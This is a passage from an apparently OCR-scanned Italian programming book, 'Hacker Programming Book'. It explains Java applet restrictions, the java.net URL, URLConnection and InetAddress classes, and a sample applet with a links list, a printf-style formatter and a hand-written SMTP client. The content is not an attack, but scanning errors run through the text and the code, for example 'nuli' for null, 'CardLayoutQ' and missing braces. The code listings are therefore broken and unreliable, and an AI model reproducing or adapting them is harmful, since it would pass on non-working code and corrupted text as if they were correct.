problema relativo alla scrittura di software per questa ultima sia quella di installare il 
compilatore. 

Una volta poi installato il tutto iniziano le varie "santificazioni" quando ci si accorge che il 
tutto non era poi cosi semplice in quanto iniziano a sorgere un infinita di "...questo non e' 
possibile farlo perché il gestore della sicurezza non permette di "...non e' permessa 
la scrittura su host perché...", "...il protocollo ha problemi se si usano streams di ecc. 
Il secondo caso invece e' costituito dal fatto che tutti parlano di TCP/IP ma pochi 
conoscono bene come questo funziona. 

Le filosofie orientali legate allo Zen (e all' arte di programmare) parlano di "medianità"' 
ovvero della ricerca del punto di equilibrio. 

Alcuni concetti a volte sono veramente complessi e la loro conoscenza totale porterebbe 
ad impiegare eccessive forze in relazione agli obbiettivi che ci si prefiggono. 
Prendiamo ad esempio il protocollo TCP/IP (Transmission Control Protocol/Internet 
Protocol). 

La conoscenza globale pretenderebbe uno sforzo notevole in quanto I' argomentazione e' 

veramente complessa soprattutto se si scende a livello di progettazione. 

In ogni caso una buona conoscenza di alcuni principi di base permette di sopperire ad 

alcuni problemi che sorgono utilizzando Java in ambiente Internet. 

Infatti alcune limitazioni relative agli applets sono veramente pesanti quali ad esempio 

quelle legate all' impossibilita' di leggere e scrivere files ecc. 

Per rinfrescare la memoria riassumiamo qui le principali limitazioni di un applet. 

1. Java può usare solo il proprio codice e non può' supportarsi su librerie esterne o 
utilizzare codice nativo di altra natura quali ad esempio il linguaggio C. 

2. Un applet non può' leggere o scrivere files. Nel caso della lettura alcuni browser la 
permettono utilizzando la specifica URL al posto del nome file (vedi a seguito la parte 
dedicata alle URL). La scrittura di file invece può' avvenire mediante tecniche di 
programmazione client/server tramite I' utilizzo dei socket (vedi anche in questo caso il 
capitolo più' avanti dedicato ai socket). 

3. Una applet non può creare connessioni eccetto che con I' host da cui proviene. 

4. Non può' eseguire programmi sull' host. 

5. Non gli e' permesso richiedere informazioni su alcune proprietà' del sistema. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



6. Una dialog creata da un applet riporta la scritta che avvisa che la finestra e' di 
proprietà' dell' applet stessa al fine di evitare la simulazione, ad esempio, di maschere 
in cui vengono richieste password e codici d' accesso ad insaputa dell' utente. 



La conoscenza del funzionamento del protocollo e delle classi di rete permette di aggirare 
gli ostacoli che si creano a seguito delle precedenti limitazioni. 
Innanzi tutto : che cosa sono i protocolli ? 

I protocolli di comunicazione nascono dall' esigenza di trasmettere dati su delle linee di 

comunicazione di diversa natura, controllandone la correttezza, in diversi ambienti, con un 

numero indefinito di partecipanti, con ambienti operativi differenti ecc. 

Inizialmente la problematica principale nasceva dall' esigenza di controllare la correttezza 

dei dati trasmessi tra due sistemi collegati punto a punto. 

In pratica semplificando si potrebbe dire : 

"lo ti trasmetto un numero X di dati in sequenza e mano mano che li invio eseguo la 
loro sommatoria. Finito di trasmetterteli ti invio la somma che ho calcolato. Tu 
mentre ricevi i dati da me inviati esegui la stessa somma. Se il valore che ti ho 
comunicato io alla fine e' uguale a quello che hai calcolato mentre ricevevi dimmi di 
proseguire nell' invio dei pacchetti se non avvertimi dell' errore e fammi ripetere I' 
invio degli stessi dati." 

Questo era valido nel caso di connessioni fisiche punto a punto. 

Quando le connessioni iniziarono a riguardare reti con più' partecipanti il problema si 
estese in quanto il pacchetto che prima conteneva soltanto i dati e la somma per la 
verifica della correttezza dovette essere estesa includendo all' interno di essa anche i dati 
relativi all' indirizzo del mittente q uello del destinatarioi. 

Questo detto in tono semplicistico per far comprendere il principio di base dei protocolli. 
I ntroduzione alla programmazione di rete conj ava 

Fino ad ora abbiamo visto alcuni concetti legati alla strutturazione di una rete sia dal punto 
di vista logico che da quello fisico. 

In java.net ritroviamo un insieme di classi utilizzate dal TCP come ad esempio la classe 
URL, la classe URLConnection, la classe Socket e la classe ServerSocket. 
Altre classi come ad esempio la classe DatagramPacket, la classe DatagramSocket e 
quella MulticastSocket sono utilizzate dal protocollo UDP. 

J ava e le sue classi rete 

In Java esiste un insieme di classi che permettono molte funzionalità' legate agli indirizzi di 

rete ed ad alcuni protocolli utilizzati a certi livelli. 

La maggior parte di queste classi sono definite dentro al package 

java.net 

Altre, come ad esempio quelle che si interessano dei protocolli FTP, SMTP ecc. sono nel 
package 

sun.net 

Al fine di poter utilizzare a livello pratico tutti gli argomenti trattati prenderemo in 
considerazione la 
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progettazione di un software e precisamente un applet che permetterà' un certo 
numero di funzionalità' comunque legate ai concetti di rete. 

Quando un utente si collega ad un sito e visualizza le pagine presente su questo 
potrebbe trovarsi dinanzi ad diverse esigenze che lo costringerebbero a ricercare ed a 
caricare degli altri software. 

Il software di cui vedremo la progettazione dovrebbe permettere : 



1 . Invio di messaggi all' host senza utilizzare mailer esterni 

2. Utilizzo di una sessione FTP per prelevare dei file dal I' host 

3. Connessione ad hosts selezionandoli da una lista proposta 

4. Ricerche su motori di ricerca senza uscire dalla pagina 

5. Indicizzazioni di strutture di pagine html alla fine della ricerca 



Mediante lo sviluppo di queste funzioni verranno viste alcune classi legate ai protocolli 
e all' utilizzo di alcune risorse. 



Tra le classi utilizzate ci sono la classe sun.net.ftp, la sun.net.smtp 

Questo primo pezzo di programma e' quello che crea il trame principale e, mediante un 

gestore di layout a schede, permette la navigazione tra le diverse funzionalità' del 

programma. 

Il gestore di layout a schede e' quello in cui lo "sfondo" rimane sempre invariato e gli 
oggetti presentati sulP interfaccia utente vengono inseriti selezionando la maschera 
adatta mediante dei tabulatori. 

L' interfaccia compatibile alle versioni 1.0 e 1.1 del JDK messa a confronto con lo 
stesso gestore di layout di Windows e' abbastanza rustica. 

Prima di vedere il codice vero e proprio diamo un occhiata alla specifica APPLET 
dentro al file HTML. 



<applet code="javaCenter.class" align="baseline" width="8" height="19" alt="The 

appletUtil Applet" name="javaCenter"> 

<param name="firstpage" value="appletUtil.html"> 

<param name="mailto" value="flavio@bernardotti.al.it"> 

<param name="mailhost" value="www.bernardotti.al.it"x/applet> 

Il primo parametro, firstpage, specifica da quale pagina iniziare la ricerca dei vocaboli o 
delle frasi specificate nella funzione di ricerca dell' applet. 

Gli altri due parametri, mailto e mailhost, specificano rispettivamente I' indirizzo a cui 
inviare le mail e il server da utilizzare per l' invio. 
Vediamo ora la prima parte del programma. 
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// 

// import delle classi utilizzate 

// 



import 


java.applet.*; 


import 


java.applet.Applet; 


import 


java.awt.*; 


import 


java.awt.image.*; 


import 


java.awt.event.*; 


import 


java.lang.reflect.*; 


import 


java.net.*; 


import 


java.util.*; 


import 


java.io.*; 


import 


sun.net.smtp.*; 


import 


sun.net.ftp.*; 


import 


sun.net.*; 



// 

// Gestisce il FRAME principale 

// 



class javaCenterFrame extends Frame implements ActionListener, WindowListener 
{ 

private String m mailhost; 
private String m_mailto; 
private String m_ftpserver; 
private String m_firstpage; 
private Applet applet; 
private Panel tabs; 
private Panel cards; 
private CardLayout layout; 

// 

// pulsanti legati alla gestione dello scorrimento delle pagine contenenti 
// le varie funzioni. 

// 

private Button first; 
private Button last; 
private Button previous; 
private Button next; 
private Button ftp; 
private Button smail; 
private Button search; 
private Button link; 
private Button cerca; 

// 

// Costruttore. I parametri sono quelli che la classe principale reperisce tra 
// gli argomenti specificati nella pagina HTML 

// 

public javaCenterFrame(Applet applet, String m_mailhost, String m_mailto, String m_ftpserver, String 
m_firstpage) 
{ 

super("javaCenter v1.0"); 

this.applet = applet; 
this.m mailhost = m mailhost; 
this.m mailto = m_mailto; 
this.m_ftpserver= m_ftpserver; 
this.m firstpage= m_firstpage; 

// 

// Crea i pulsanti che permettono la navigazione tra i pannelli in cui sono presenti le varie 

funzioni 

// gestite dal programma. 

// 

tabs = new Panel(); 

first = new Button("«"); 

tabs.add(first); 

previous = new Button("<"); 

tabs.add(previous) ; 

smail = new Button("lnvia mail"); 

tabs.add(smail); 

search = new Button("Esegui ricerche"); 

tabs.add(search); 

link = new Button("Links"); 

tabs.add(link); 

ftp = new Button("FTP"); 

tabs-add(ftp); 
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cerca = new Button("Cerca su host"); 

tabs.add(cerca); 

next = new Button(">"); 

tabs.add(next); 

last = new Button("»"); 

tabs.add(last): 

add("North", tabs); 



// 

// registra i vari pulsanti alla funzione che intercetta gli eventi dalla quale avvengono le 

chiamate 

// ai vari moduli. Vedi actionPerformed() 

// 

ftp.addActionListener(this); 

Nnk.addActionListener(this); 

first.addActionListener(this); 

last.add Action Listener(this) ; 

previous.addActionListener(this); 

next.addActionListener(this); 

smail.addActionListener(this); 

search.addActionListener(this); 

cerca.addActionListener(this); 

cards = new Panel(); 

// 

// Stabilisce che il gestore del layout d a schede 

// 

layout = new CardLayoutQ; 
cards.setLayout(layout); 

// 

// Stabilisce per ogni pannello le funzioni assegnandogli la classe che dovrà 
// essere creata e richiamata a seconda della selezione fatta. 

// 

cards. add("lnvia mail", new javaCenterSendMail(applet, m mailhost, m mailto)); 
cards. add("Esegui ricerche", new javaCenterSearch(applet)); 
cards.add("Links", new javaCenterLinks(applet)); 
cards.add("FTP", new javaCenterFTP(m_ftpserver)); 
cards.add("Cerca su host", new javaCenterSHost(m firstpage, applet)); 

add("Center", cards); 

setBackground(Color.lightGray); 

addWindowListener(this); 

pack(); 

setSize(500, 360); 
setVisible(true); 

} 

// 

// Intercetta gli eventi che avvengono sugli oggetti piecedentemente registrati 

// 

public void actionPerformed(ActionEvent e) 

{ 

String selected = e.getActionCommand(); 

if(selected.equals("«")) { layout.first(cards); return; } 
if(selected.equals("»")) { layout.last(cards); return; } 
if(selected.equals("<")) { layout. previous(cards); return; } 
if(selected.equals(">")) { layout. next(cards); return; } 
if(selected.equals("lnvia mail")) { layout.show(cards, "hvia mail"); return; } 

if(selected.equals("Esegui ricerche")) { layout. show(cards, "Esegui ricerche"); return; } 

if(selected.equals("About")) { layout.show(cards, "About"); return; } 
if(selected.equals("Links")) { layout.show(cards, "Links"); return; } 
if(selected.equals("FTP")) { layout.show(cards, "FTP"); return; } 
if(selected.equals("Cerca su host")) { layout.show(cards, "Cerca su host"); return; } 



} 



// 

// Intercetta I' evento di chiusura della finestra 

// L' implementazione di windowListener pretende che comunque siano presenti 
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// le diachiarazioni degli altri metodi. 

// 



public void windowClosing(WindowEvent e) { disposef); } 

public void windowOpened(WindowEvent e) {} 

public void windowClosed(WindowEvent e) {} 

public void windowDeiconified(WindowEvent e) {} 

public void windowDeactivated(WindowEvent e) {} 

public void windowActivated(WindowEvent e) {} 

public void windowlconified(WindowEvent e) {} 



// 

// Classe principale del programma (entry point) 

// Recupera i parametri specificati nel file HTML se no utilizza quelli di default 
// specificati nella dichiarazione delle variabili 

// 

public class javaCenter extends Applet 
{ 

private String m mailhost = "www.bernardotti.al.it"; 
private String m mailto = "flavio@bernardotti.al.it"; 

private String m ftpserver = "www.bernardotti.al.it"; 
private String m_firstpage = "index.html"; 

private final String PARAM mailhost = "mailhost"; 
private final String PARAM mailto = "mailto"; 

private final String PARAM ftpserver= "ftpserver"; 
private final String PARAM_firstpage= "firstpage"; 



Recupera un argomento specifico 



String GetParameter(String strName, String args[]) 
{ 

if (args == nuli) 
{ 

return getParameter(strName); 

} 

int i; 

String strArg = strName + "="; 

String strValue = nuli; 

int nLength = strArg. lengthQ; 

try 
{ 

for (i = 0; i < args.length; i++) 
{ 

String strParam = args[i].substring(0, nLength); 

if (strArg.equalslgnoreCase(strParam)) 
{ 

strValue = args[i].substring(nLength); 

if (strValue.startsWith("\"")) 

{ 

strValue = strValue.substring(l); 
if (strValue.endsWith('Y"')) 

strValue = strValue.substring(0, 



strValue.length()-1); 



} 

break; 



} 

catch (Exception e) {} 
return strValue; 



// Recupera i tre argomenti assegnandoli ciascuno alla propria variabile 

// 

void GetParameters(String args[]) 
{ 

String param = ""; 

param = GetParameter(PARAM mailhost, args); 
if (param != nuli) 

m mailhost = param; 
param = GetParameter(PARAM_mailto, args); 
if (param != nuli) 

m_mailto = param; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



param = GetParameter(PARAM_ftpserver, args); 
if (param != nuli) 

m_ftpserver = param; 
param = GetParameter(PARAM_firstpage, args); 
If (param != nuli) 

m_firstpage = param; 

} 

public void initQ 

< 

GetParameters(null); 

new javaCenterFrame(this, m_mailhost, m_mailto, m_ftpserver, m_firstpage); 

. 1 

Dopo aver visto le classi principale e quella che gestisce il frame 
interessiamoci di vedere al classe che presenta a video una lista di WEB 
presenti in un file chiamato links.txt il quale viene identificato come una 
risorsa, aperto, letto ed inserito dentro una lista da cui potrà' essere 
selezionato. 

Il file conterra' i dati relativi ai WEB nella forma : 



WEB I DESCRIZIONE_ WEB / 



Ad esempio : 

www.bernardotti.al.itlWEB di chi ha scritto questa romanza 
www.javasoft.com | Sito SUN dedicato al software Java| 




Il file verrà' identificato come risorsa presente sul WEB mediante la 
costruzione del suo URL. 

Dopo averlo aperto mediante la classe stringTokenizer verrà' analizzato in 
modo da suddividere la denominazione del sito dalla sua descrizione. 

Mediante una classe di formattazione i dati verranno inseriti in una lista dalla 

quale sarà' possibile selezionare il sito a cui connettersi. 

La classe javaCenterForm proviene da una classe public domain trovata su 

internet. 

Il suo compito e' quello di eseguire formattazioni tipo quelle fatte dalla printf() del C. 

La riga di programma che utilizza tale classe per creare la riga da inserire 

nella lista e' la seguente : 
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Mediante il metodo showDocument della classe applet verrà' aperta una 
nuova pagina del browser con la pagina del sito scelto. 

applet.getAppletContext().showDocument(u, "_blank"); 



class javaCenterForm 
{ 

public javaCenterForm(String s) 

< 

width = 0; 
preclslon = -1 ; 
pre = ""; 
post = ""; 

leading_zeroes = false; 
show plus = false; 
alternate = false; 
show_space = false; 
left_align = false; 
fmt = ' '; 

int length = s.lengthQ; 
int parse_state = 0; 
Int i = 0; 

while (parse_state == 0) 
{ 

if (i >= length) 

parse_state = 5; 

else 

if (s.charAt(i) == '%') { 
if (i < length - 1) { 

if (s.charAt(i + 1) =='%'){ 

pre = pre + '%'; 

i++; 

} else 

parse_state = 1 ; 

} 

else throw new java.lang.lllegalArgumentException(); 

} 

else 

pre = pre + s.charAt(i); 

i++; 

} 

while (parse_state == 1) { 

if (i >= length) parse state = 5; 
else 

if (s.charAt(i) == ' ') show_space = trae; 
else 

if (s.charAt(i) == '-') left_align = true; 
else 

if (s.charAt(i) == '+') show_plus =true; 
else 

if (s.charAt(i) == '0') leading_zeroes = true; 
else 

if (s.charAt(i) == '#') alternate = true; 
else { parse_state = 2; i~; } 

i++; 

} 

while (parse_state == 2) 
{ 

if (i >= length) parse state = 5; 

else if ('0' <= s.charAt(i) && s.charAt(i) <= '9') 

{ 

width = width * 10 + s.charAt(i)- '0'; 
i++; 

} 

else if (s.charAt(i) == '.') { 
parse_state = 3; 
precision = 0; 
i++; 

} 

else 

parse_state = 4; 

} 

while (parse_state == 3) 

{ if (i >= length) parse state = 5; 
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{ precision = precision * 10 + s.charAt(i)- '0'; 

} 

else 

parse_state = 4; 

} 

if (parse_state == 4) 

{ if (i >= length) parse state = 5; 

else fmt = s.charAt(i); 

i++; 

} 

if (i < length) 

post = s.substringfi, length); 

} 

public String form(String s) 
{ 

if (fmt != 's') 

throw new java.lang.lllegalArgumentException(); 
if (precision >= 0) 

s = s.substring(0, precision); 
return pad(s); 

} 



private static String repeat(char c, int n) 
{ 

if (n <= 0) return ""; 
StringBuffer s = new StringBuffer(n); 
for (int i = 0; i < n; i++) s.append(c); 
return s.toStringf); 

} 

private static String convert(long x, int n, int m, String d) 

{ 

if (x == 0) return "0"; 
String r = ""; 
while (x != 0) { 

r = d.charAt((int)(x & m)) + r; 

x = x »> n; 

} 

return r; 

} 

private String pad(String r) 

{ 

String p = repeatf ', width - r.length()); 
if (left_align) return pre + r + p + post; 
else 

return pre + p + r + post; 

} 

private String sign(int s, String r) 
{ 

String p = ""; 
if (s < 0) p = "-"; 
else if (s > 0) 
{ 

if (show_plus) p = "+"; 
else 

if (show_space) p = " "; 

} 

else 
{ 

if (fmt == 'o' && alternate && r.length() > 0 && r.charAt(O) != '0') p = "0"; 
else if (fmt == 'x' && alternate) p = "Ox"; 
else if (fmt == 'X' && alternate) p = "0X"; 

} 

int w = 0; 

if (leading_zeroes) 

w = width; 

else 

if ((fmt == 'd' || fmt == 'i' || fmt == 'x' || fmt == 'X' || fmt == 'o') && precision > 0) w = precision; 
return p + repeat('0', w - p.length() - r.length()) + r; 

} 



private String fixed format(double d) 

{ 

String f = ""; 

if (d > 0X7FFFFFFFFFFFFFFFL) return expjormat(d); 

long I = (long)(precision == 0 ? d + 0.5 : d); 
f = f + l; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



doublé fr = d - 1; // fractional part 

if (fr >= 1 || fr < 0) return exp_format(d); 

return f + frac„part(fr); 

} 

private String frac partfdouble fr) 

{ 

String z = ""; 

if (precision > 0) { 

doublé factor = 1 ; 

String leading zeroes = ""; 

for (int i = 1 ; i <= precision && factor <= 0x7FFFFFFFFFFFFFFFL; i++) { 
factor *= 10; 

leading_zeroes = leading_zeroes + "0"; 

} 

long I = (long) (factor * fr + 0.5); 
z = leading zeroes + I; 

z = z.substring(z.length() - precision, z.length()); 

} 

if (precision > 0 || alternate) z = "." + z; 
if ((fmt == 'G' || fmt == 'g') && [alternate) { 

int t = z.lengthQ - 1 ; 

while (t >= 0 && z.charAt(t) == '0') t-; 

if (t >= 0 && z.charAt(t) == '.') t~; 

z = z.substring(0, t + 1); 

} 

return z; 

} 

private String exp formatfdouble d) 
{ 

String f = ""; 
int e = 0; 
doublé dd = d; 
doublé factor = 1 ; 

while (dd > 10) { e++; factor /= 10; dd = dd / 10; } 
while (dd < 1) { e~; factor *= 10; dd = dd * 10; } 
if ((fmt == 'g' || fmt == 'G') && e >= -4 && e < precision) 
return fixed_format(d); 

d = d * factor; 

f = f + fixed_format(d); 

if (fmt == 'e' || fmt == 'g') 
f = f + "e"; 

else 

f = f + "E"; 

String p = "000"; 
if (e >= 0) 
{ 



} 

else 
{ 



f = f + "+"; 
P = P + e; 



f = f + "-"; 
P = P + (-e); 



} 



} 

return f + p.substring(p.length()- 3, p.lengthQ); 



private int width; 
private int precision; 
private String pre; 
private String post; 
private boolean leading zeroes; 
private boolean show plus; 
private boolean alternate; 
private boolean show_space; 
private boolean left align; 
private char fmt; 



// Classe che gestisce la lista di WEB consigliati e permette la connessione 

// 

class javaCenterLinks extends Panel implements ActionListener 
{ 

private Applet applet; 
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private java.awt.List lista; 
private String inputLine; 
private TextField sito; 

public javaCenterLinks(Applet applet) 

{ 

super(); 

this.applet = applet; 
setBackground(Color.lightGray); 
setLayout(new BorderLayoutO); 
Panel panel = new Panel(); 

panel.setLayout(new FlowLayout(FlowLayout.RIGHT)); 

Label strTmp = new Label("Lista siti segnalati. Connessione a :"); 
sito = new TextField("", 40); 

panel.add(strTmp); 
panel. add(sito); 

add(panel, "North"); 

// 

// Crea la risorsa list in cui verranno inseriti i siti letti dal file links.txt 

// 

lista = new java.awt.List(20, false); 
Msta.setFont(new FontfCourier", Font.PLAIN, 10)); 
lista.setBackground(new Color(0,60,0)); 
Msta.setForeground(new Color(0,255,0)); 
add(lista, "Center"); 

Button connetti = new Buttonf'Connetti"); 
add(connetti, "South"); 
lista. removeAIIO; 

setCursor(new Cursor(Cursor.WAIT_CURSOR)); 
try{ 

// 

// Crea un URL che punta alla "risorsa" file links.txt 

// Il file contiene il nome dell' host e la su descrizione nella forma 

// NOME|DESCRIZIONE| 

// ATTENZIONE IL CARATTERE T e' ALT+124 (PIPE) 

// 

URL tmpURL = new URL(applet.getDocumentBase(), "links.txt"); 
DatalnputStream ci = new DatalnputStream(tmpURL.openStream()); 
while ((inputLine = new String(cl.readLineO)) != nuli) { 

// 

// Legge linea dopo linea fino alla fine del file e mediante la classe 
// stringTokenizer isola i due "token" che rappresentano 
// 1' identificativo del WEB e la sua descrizione 

// 

StringTokenizer database = new StringTokenizer(inputLine, "|"); 

String address = database.nextToken(); 

String descrizione = new String(database.nextToken()); 

// 

// Li inserisce nella lista dopo aver formattato ia linea mediante 
// la classe javaCenterForm 

// 

lista.add(new javaCenterForm("%-40s").form(address) + " " + descrizione); 

} 

cl.closeO; 

} 

catch (lOException exc) { System.out.println(exc.toString();} 
catch (Exception exc) { System.out.println(exc.toString());} 

setCursor(new Cursor(Cursor.DEFAULT_CURSOR)); 

// 

// Registra il pulsante "Connetti" in modo tale che possa essere intercettata 
// la pressione di questo. Vedi actionPerformed() 

// 

connetti.addActionListener(this); 
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// 

// Intercetta le azioni avvenute sugli oggetti registrati 
// mediante la funzione oggetto.addActionListener(this); 

// 

public void actionPerformed(ActionEvent e) 

{ 

String selected = e.getActionCommand(); 
if(selected.equals("Connetti")) { 

setCursor(new Cursor(Cursor.WAIT_CURSOR)); 

String choiceString = new String(lista.getltem(lista.getSelectedlndex())); 
StringTokenizer database = new StringTokenizer(choiceString, " "); 
String connessione = database.nextToken(); 
sito.setText(connessione); 
try{ 

// 

// Crea una risorsa URL data dal nome del sito 

// e si connette aprendo una pagina nuova del brwser 

// 

URL u = new URL(connessione); 
applet.getAppletContext().showDocument(u, "_blank"); 
} catch (MalformedURLException exc) { System.out.println(exc.toStringO); } 

setCursor(new Cursor(Cursor.DEFAULT_CURSOR)); 



} 

} 



Una delle classi fondamentali, che abbiamo visto nel modulo precedente, e' 
la classe URL. 

La classe URL rappresenta un puntatore ad una risorsa presente su un WEB 

la quale viene reperita utilizzando I' Uniform Resource Locator. 

Una risorsa potrebbe essere un normalissimo file o directory od un oggetto 

più' complesso come ad esempio un interrogazione su un database. 

Un URL normalmente viene suddiviso in due parti 

HTTP:// www.bernardotti.al.it 
Protocollo Risorsa 

La prima parte specifica il protocollo mentre la seconda la risorsa. 

Esistono diversi costruttori mediante i quali e' possibile creare una risorsa 

URL. 

Il più' semplice e' il seguente : 

URL sunSoft = new URL("http://www.javasoft.com/"); 



Esistono altri costruttori che permettono di specificare le risorse in modo differente, 
utilizzando anche il numero di porta se necessario. 
Ad esempio : 




e' equivalente a 
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Ogni costruttore URL può' generare un eccezione legata al protocollo errato o alla risorsa 
sconosciuta. 

L' eccezione può' essere intercettata con il seguente costrutto : 
try{ 

URL sunSoft = new URL("http://www.javasoft.com/"); 
} catch(MalformedURLException e) { ... handler all' eccezione ...} 

La classe URL contiene inoltre diversi metodi destinati a ricevere informazioni 
legate alla URL stessa. 

Fate attenzione che non e' detto che tutte le informazioni debbano essere 
presenti. 

Vediamo i seguenti metodi : 



getProtocol () 


Ritorna il protocollo 


getHost () 


Ritorna il nome dell' host 


getPort () 


Ritorna il numero della porta o -1 se non e' stata specificata 




durante la creazione 


getFile () 


Ritorna il nome del file 



Alcune volte dopo che e' stata creata un URL e' possibile utilizzare il metodo openConnection() per 
creare un collegamento tra il programma Java e I ' URL stesso. 

Per esempio e' possibile creare una connessione con un sito, Altavista ad esempio, mediante il 
codice : 



try{ 



} 



URL urlTmp = new URL("http://www. altavista.digital.com/"); 
URLConnection urlCon = urlTmp.openConnection(); 



catch (MalformedURLException e) {} 
catch (lOException e) {} 



Se la connessione ha avuto successo questa potrà' essere utilizzata per funzioni di 
lettura e di scrittura. 

Molte funzioni legate al reperimento di immagini, suoni, files ecc. necessitano dell' 
URL. 

Ad esempio : 

public Image getlmage(URL uri) 



I seguenti metodi mostrano alcuni esempi pratici. 

Image imagel = getlmage(getCodeBase(), "imageFile.gif"); 

Image image2 = getlmage(getDocumentBase(), "anlmageFile.jpeg"); 

Image image3 = getlmage(new 



Esistono due metodi della classe Applet, utilizzati moltissime volte, che permettono di 
ricavare, in ordine : 

1 . L' URL della pagina che chiama I' applet 
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Le funzioni sono in ordine : 

Applet.getDocumentBase() 
Applet.getCodeBase() 

Come abbiamo appena visto i due metodi sono stati utilizzati nel punto in cui era necessario 
fornire come argomenti l'URL dell' host da cui era stato caricato I' applet. 



Questa classe contiene molti metodi utili quando si lavora con URL HTTP. 

Fate attenzione che si tratta di una classe astratta e quindi non può' essere istanziata 

direttamente. 

Invece di utilizzare un costruttore vedremo come può' essere utilizzato il metodo 
openConnection() della classe URL 

La seguente funzione mostra come eseguire la lettura sfruttando la classe 

URLConnection. 

Esempio : 



importjava.net.*; 
import java.io.*; 

public class URLConnReadr { 

public statlc vold main(String[] args) throws Exceptlon { 

URL tmpUrl = new URL("http://www.altavista.digital.com/"); 

URLConnection URLConn = tmpUrl.openConnectlonQ; 

BufferedReader In = new BufferedReader( new 
lnputStreamReader(URLConn.getlnputStream())); 

Strlng InputLlne; 

whlle ((InputLlne = In.readLlneO) != nuli) System.out.prlntln(lnputLlne); 
in.close(); 



Nella classe URLConnection esistono un grosso numero di metodi e variabili. 
Due di queste variabili e due metodi che settano queste variabili sono degni di nota in 
quanto permettono di eseguire funzioni di input e di output sulla connessione creata. 
In pratica le variabili sono : 



doOutput 



A seconda del valore che viene settato (true/false) si indica che I' applet vuole 
eseguire, in ordine, dell' output e dell' input sulla URLConnection. 
Queste variabili possono essere settate dai metodi : 



void setDoOutput(boolean) 
void setDolnput(boolean) 

Altri due metodi, uno visto nel codice in alto, permettono di ricavare rispettivamente 
un stream di output ed uno di input dall' URLConnection. 
I due metodi sono : 



OutputStream getOutputStream() 



Esistono alcune classi che spesso risultano essere utili come ad esempio la 
InetAddress la quale permette di creare e registrare degli indirizzi utilizzati da altre 
classi. 

Quest' ultima classe di fatto non possiede costruttori pubblici ma in compenso 
dispone di diversi metodi statici che possono essere utilizzati per creare delle istanze 
della classe. 
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Tutti i metodi sono statici e devono essere utilizzati nel seguente modo. 

InetAddress addr = lnetAddress.getBvNameC www.iavasoft.com "); 

InetAddress addr = InetAddress. getl_ocalHost(); 

InetAddress addr[] = InetAddress. qetAIIBvName(" www. javasoft.com "); 

Le precedenti funzioni generano un UnknownHostException se il sistema non e' 
collegato a un DNS. 

Per DNS si intende Domain Name Server. 

In altre parole il TCP/IP permette di far riferimento agli host di una rete mediante 
appositi nomi invece di usare l' indirizzo IP. 

In pratica il DNS e' il metodo che ci permette di riferirci ad un sistema quello che 
normalmente costituito dal nomeHost.nomeDominio (i vari www.iavasoft.com , 
www.bernardotti.al.it ecc.) 

Inoltre la classe InetAddress include numerose variabili e funzioni per memorizzare 
indirizzi host Internet. 

public String hostName Questa variabile contiene il nome dell' host nella 

forma www.xx.vy 

public int address L' indirizzo numerico dell' host (x.y.z.j) 

public String localHostName Contiene il nome dell' host locale ovvero quello del 

computer su cui viene eseguita I' applicazione. 

Dopo questa panoramica sulla classe URL utilizzata nella prima parte del programma 
vediamo una seconda parte ovvero quella che si interessa dell' invio di messaggi all' 
host. 

La classe e' suddivisa in due parti. 

La prima crea la maschera video in cui viene richiesto di inserire I' email del mittente 
e il testo del messaggio. 

Il server mail utilizzato per I' invio viene specificato nei parametri della pagina HTML 
mediante la voce 

<param name="mailhost" value="www.bernardotti.al.it"> 

La seconda parte e' quella invece che si interessa della creazione del messaggio e 
del suo invio. 

Come abbiamo già' detto esiste una porta specifica, la 25 , che permette di 
comunicare con il demone mail presente sul server. 
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Questo non significa che, dopo aver aperto un Socket su quella porta, tutto ciò' che 
verrà' scritto verrà' inviato come mail. 

I dati scritti su tale socket dovranno essere formattati in un determinato modo per 
essere considerati un messaggio valido e quindi per essere smistato. 
Le informazioni dovrebbero avere la seguente formattazione : 
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HELO host mittente 
MAIL FROM: mittente 
RCPTTO: ricevente 
DATA 

Messaggio (qualsiasi numero linee) 
QUIT 

Esiste una classe in sun.net.smtp che permette la gestione del messaggio. 
Nel nostro modulo riscriveremo completamente la parte che si interessa della 
creazione e dell' invio del messaggio in modo tale da vedere in funzione alcune classi 
legate alla gestione della rete. 



• Parte 3 file javaCenter.java 

a 

// Classe che crea il messaggio e lo Invia 

// In pratica svolge le funzioni della classe sun.net.smtp 

// 

class javaCenterSmtp { 

static final int D E FAU LTPO RT = 25; 
static final String EOL = "\r\n"; 

protected DatalnputStream reply = nuli; 
protected PrintStream send = nuli; 
protected Socket sock = nuli; 

public javaCenterSmtp( String hostid) throws UnknownHostException, lOException { 
this(hostid, DEFAULT PORT); 

} 

public javaCenterSmtp( String hostid, int port) throws UnknownHostException, lOException { 

// 

// Apre un socket sulla porta 25 

// La porta 25 e' relativa al demone di gestione mail 

// 

sock = new Socket( hostid, port ); 
reply = new DatalnputStream( sock.getlnputStream() ); 
send = new PrintStream( sock.getOutputStream() ); 
String rstr = reply.readLine(); 

if (!rstr.startsWith("220")) throw new ProtocolException(rstr); 
while (rstr.indexOf('-') == 3) { 

rstr = reply.readLine(); 

if (!rstr.startsWith("220")) throw new ProtocolException(rstr); 

} 

} 

public javaCenterSmtp( InetAddress address ) throws lOException { 
this(address, D E FAU LTPO RT) ; 

} 

public javaCenterSmtpf InetAddress address, int port ) throws lOException { 
sock = new Socket( address, port ); 

// 

// Apre uno stream di input e uno di output 

// Mediante quello di output invia le stringhe contenenti le 

// formattazioni dei messaggi. 

// Sulle stream di input legge le repliche. 

// 

reply = new DatalnputStream( sock.getlnputStream() ); 
send = new PrintStream( sock.getOutputStream() ); 
String rstr = reply.readLine(); 

if (!rstr.startsWith("220")) throw new ProtocolException(rstr); 
while (rstr.indexOff-') == 3) { 

rstr = reply.readLine(); 

if (!rstr.startsWith("220")) throw new ProtocolException(rstr); 

} 

} 

public void sendmsg( String from_address, String to address, String subject, String message ) throws 
lOException, 

ProtocolException { 

String rstr; 
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String sstr; 

InetAddress locai; 
try{ 

locai = InetAddress.getLocalHostO; 

} 

catch (UnknownHostException ioe) { 

System. err.println("No locai IP address found - is your network up?"); 
throw ioe; 

} 

// 

// Reperisce il nome del server mail e crea il testo formattato 

// Per ogni stringa inviata mediante uno stream di output legge la replica 

// utilizzando uno stream d' input 

// 

String host = locai. getHostNamef); 

send.print("HELO " + host); 

send.print(EOL); 

send.flushO; 

rstr = reply.readLine(); 

